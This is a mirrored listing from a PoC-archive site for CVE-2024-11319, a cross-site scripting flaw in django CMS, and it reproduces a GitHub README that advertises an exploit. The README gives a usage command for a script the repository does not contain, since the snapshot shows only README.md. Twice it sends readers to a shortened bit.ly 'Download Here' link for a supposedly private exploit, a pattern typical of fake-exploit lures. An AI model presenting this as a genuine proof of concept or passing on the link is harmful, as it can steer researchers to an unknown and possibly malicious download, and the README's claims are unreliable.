CVE-2024-11319 PoC — django CMS 安全漏洞

Source

https://github.com/famixcm/CVE-2024-11319

Associated Vulnerability

Title:django CMS 安全漏洞 (CVE-2024-11319)
Description:django CMS是django CMS开源的一个基于 django 框架的开源企业内容管理系统。 django CMS 3.11.7、3.11.8、4.1.2和4.1.3版本存在安全漏洞，该漏洞源于网页生成期间输入中和不当，容易受到跨站脚本攻击。

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

Readme

# CVE-2024-11319: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

## Overview

An Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability has been identified in django CMS Association's django-cms

## Exploit
**[Download Here](https://bit.ly/3APaYDU)**

## Details
+ **CVE ID:** CVE-2024-11319
+ **Published:** 18/11/2024
+ **Impact:** Critical
+ **Exploit Availability:** Not public, only private.
+ **CVSS:** 9.3


## Vulnerability Description

This vulnerability allows an attacker to execute malicious scripts in a user's browser within the context of the affected django-cms site.


## Affected Versions

This issue affects **django-cms: 3.11.7, 3.11.8, 4.1.2, 4.1.3.**


## Usage
```
python CVE-2024-11319.py
```

## Contact
For inquiries, please contact famixcm@thesecure.biz

## Exploit
**[Download Here](https://bit.ly/3APaYDU)**

File Snapshot


 [4.0K]  /data/pocs/b19860576e05511387aec488c221aca8f09fd16c
└── [ 936]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!